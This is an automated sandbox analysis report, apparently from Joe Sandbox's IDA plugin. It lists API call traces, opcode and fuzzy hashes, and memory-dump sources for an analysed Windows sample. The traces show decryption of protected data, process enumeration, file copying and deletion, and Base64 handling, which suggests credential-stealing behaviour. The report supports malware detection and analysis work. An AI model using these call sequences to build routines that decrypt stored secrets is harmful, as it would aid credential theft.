                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $,?$($+Wm$-yu$L~_
                          • API String ID: 0-3400599982
                          • Opcode ID: 3ea968a5fd356755f76789e7f64dfc3fac47d8f1f5a9239290b4c74d401ec4bc
                          • Instruction ID: 2e4248aa7515844f8632ed886fe2afa74e77242e72905cff6259b8e202cc7907
                          • Opcode Fuzzy Hash: 3ea968a5fd356755f76789e7f64dfc3fac47d8f1f5a9239290b4c74d401ec4bc
                          • Instruction Fuzzy Hash: 8FB216F3A08210AFD3046E2DDC8566AFBE9EF94720F1A493DEAC4D3744E63598418797
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007D775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D7765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007D778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007D77AD
                          • LocalFree.KERNEL32(?), ref: 007D77B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: c5eecb24346c37d069fe8c956600f1f96790976d1ed58b271a88483698daefb6
                          • Instruction ID: 6f5421b2a3bc44541c91ee974ffd229d04c5515ddb10b2291e099baf7ba69871
                          • Opcode Fuzzy Hash: c5eecb24346c37d069fe8c956600f1f96790976d1ed58b271a88483698daefb6
                          • Instruction Fuzzy Hash: DC011E75B40308BBEB10DFE49C4AFAB7B78EB44B11F104155FB09EA2C0D6B0A902CB95
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &nxx$5"6$F"{$PQwk$PQwk
                          • API String ID: 0-2218045152
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: x%$27}$?w?w$MhPq
                          • API String ID: 0-2013571314
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !>C:$PA}{$XE{U$y:o
                          • API String ID: 0-3224491328
                          APIs
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F3A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F3AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F3ABF
                            • Part of subcall function 007F7310: lstrlen.KERNEL32(------,007D5BEB), ref: 007F731B
                            • Part of subcall function 007F7310: lstrcpy.KERNEL32(00000000), ref: 007F733F
                            • Part of subcall function 007F7310: lstrcat.KERNEL32(?,------), ref: 007F7349
                            • Part of subcall function 007F7280: lstrcpy.KERNEL32(00000000), ref: 007F72AE
                          • CloseHandle.KERNEL32(00000000), ref: 007F3BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 007DEA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 007DEA7E
                          • lstrcat.KERNEL32(007FCFEC,007FCFEC), ref: 007DEB27
                          • lstrcat.KERNEL32(007FCFEC,007FCFEC), ref: 007DEB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 007F40CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 007F40DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F40E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 007F4113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,007FA3D0,000000FF), ref: 007F2B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 007F2B96
                          • GetLocalTime.KERNEL32(?,?,00000000,007FA3D0,000000FF), ref: 007F2BA2
                          • wsprintfA.USER32 ref: 007F2BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007D9B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 007D9B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007D9B61
                          • LocalFree.KERNEL32 ref: 007D9B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          APIs
                          • CoCreateInstance.COMBASE(007FB110,00000000,00000001,007FB100,?), ref: 007ECB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007ECB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 007ECBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007D9B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007D9BB3
                          • LocalFree.KERNEL32(?), ref: 007D9BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: e11424d2fb01ecaed0eb902abcabacd831fc69bf10d787904691d134305298ba
                          • Instruction ID: b9713385dfbbf0f1fae2f698b62689d6732228bb1e162fbf386319eca986f083
                          • Opcode Fuzzy Hash: e11424d2fb01ecaed0eb902abcabacd831fc69bf10d787904691d134305298ba
                          • Instruction Fuzzy Hash: 7D011DB5E4120AABE710DBA4DC45FABB778EB48B00F104555EA05AB381D7B4AA018BE5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: fm}}
                          • API String ID: 0-3408078218
                          • Opcode ID: 2994352708fe4c39ae78e543721fc117ff220bd32ef056dd91a2d5881eef9d8c
                          • Instruction ID: 937a85c5c30b84efa3f15a8bd2a2f802da72029072fe8a34119e16f68c615203
                          • Opcode Fuzzy Hash: 2994352708fe4c39ae78e543721fc117ff220bd32ef056dd91a2d5881eef9d8c
                          • Instruction Fuzzy Hash: 434103F3A182005BF3089E38EC8577B77D6EBE4720F1A853DEAC5C7784E93958058656
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0504fc42c6c94dc4fbe9241523582fe1d04cb9f58496944824d2de76a6a226dc
                          • Instruction ID: 5c13bc5c627cf033aa430f865b3b7928e8ee022925d3528279d45559cf80b42d
                          • Opcode Fuzzy Hash: 0504fc42c6c94dc4fbe9241523582fe1d04cb9f58496944824d2de76a6a226dc
                          • Instruction Fuzzy Hash: 325127F3E085005BF3189A28DC9A77BB696EBD0320F1AC53DEA85977C5E83D580582D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a5cc92954bec45fbf46a4151b53964f39978d53e04602d2580ddde2d59b0247
                          • Instruction ID: d09c6ac8b5ef4d373b093df7a8f99d9fb6935f1395ad3786a763d3ab7f6b0ac2
                          • Opcode Fuzzy Hash: 9a5cc92954bec45fbf46a4151b53964f39978d53e04602d2580ddde2d59b0247
                          • Instruction Fuzzy Hash: 8741ADB3A086109FE714AE6DDC8576AF7E6EF98320F16893DDAC8D3344E63458018686
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 04938b91152fe48cf4aa1b0d4a200497c0b81b8cc660d523fff78182a2eb491c
                          • Instruction ID: d3d62b8aa7a071fefd00aed62541b22256898fa506b00a637a30a6d829e95ecd
                          • Opcode Fuzzy Hash: 04938b91152fe48cf4aa1b0d4a200497c0b81b8cc660d523fff78182a2eb491c
                          • Instruction Fuzzy Hash: 244182B39086148FF304AE25DC8573AF7E6EF94320F17493CDAC487290DA7958418B97
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E8636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 007E86AA
                          • StrStrA.SHLWAPI(?,0125E1A8), ref: 007E86CF
                          • lstrcpyn.KERNEL32(00A093D0,?,00000000), ref: 007E86EE
                          • lstrlen.KERNEL32(?), ref: 007E8701
                          • wsprintfA.USER32 ref: 007E8711
                          • lstrcpy.KERNEL32(?,?), ref: 007E8727
                          • StrStrA.SHLWAPI(?,0125E1C0), ref: 007E8754
                          • lstrcpy.KERNEL32(?,00A093D0), ref: 007E87B4
                          • StrStrA.SHLWAPI(?,0125E1D8), ref: 007E87E1
                          • lstrcpyn.KERNEL32(00A093D0,?,00000000), ref: 007E8800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 23ede9c9adb33c623316abd8c8689e112efe7e62a166a15f7dcf5d921da5eb87
                          • Instruction ID: 91b1ea9cb3c9f5abe96a93a7dfde0ca9411411a6cb08c6d94c8db5582002f1a0
                          • Opcode Fuzzy Hash: 23ede9c9adb33c623316abd8c8689e112efe7e62a166a15f7dcf5d921da5eb87
                          • Instruction Fuzzy Hash: 3EF17E71901119EFDB10DBB4DD48AAB77B9EF88300F104599E949E7251DF38AE02CBA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1F9F
                          • lstrlen.KERNEL32(01259298), ref: 007D1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1FE3
                          • lstrlen.KERNEL32(00801794), ref: 007D1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D200E
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D204D
                          • lstrlen.KERNEL32(00801794), ref: 007D2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2075
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D2081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D20AC
                          • lstrlen.KERNEL32(?), ref: 007D20E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2104
                          • lstrcat.KERNEL32(00000000,?), ref: 007D2112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2139
                          • lstrlen.KERNEL32(00801794), ref: 007D214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D216B
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D2177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D21A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D21D4
                          • lstrlen.KERNEL32(?), ref: 007D21EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D220A
                          • lstrcat.KERNEL32(00000000,?), ref: 007D2218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2242
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D227F
                          • lstrlen.KERNEL32(0125D580), ref: 007D228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D22B1
                          • lstrcat.KERNEL32(00000000,0125D580), ref: 007D22B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D22F7
                          • lstrcat.KERNEL32(00000000), ref: 007D2304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007D2356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D23BF
                          • DeleteFileA.KERNEL32(00000000), ref: 007D23F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007D2444
                          • FindClose.KERNEL32(00000000), ref: 007D2453
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: 5247a5d2bc165a99382f357404d2a44116c68f6571861a81de1e9f22a3aab2b3
                          • Instruction ID: 8cd542dcf459aefe899cd4bdf2e9dce405d15bb56a3ad495c58a10d575e52a2d
                          • Opcode Fuzzy Hash: 5247a5d2bc165a99382f357404d2a44116c68f6571861a81de1e9f22a3aab2b3
                          • Instruction Fuzzy Hash: 65E14371A1121ADBCB21EFA4DD49A9E77B9EF64300F049126F805A7352DB3CDD078B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6445
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007E64AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E64E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
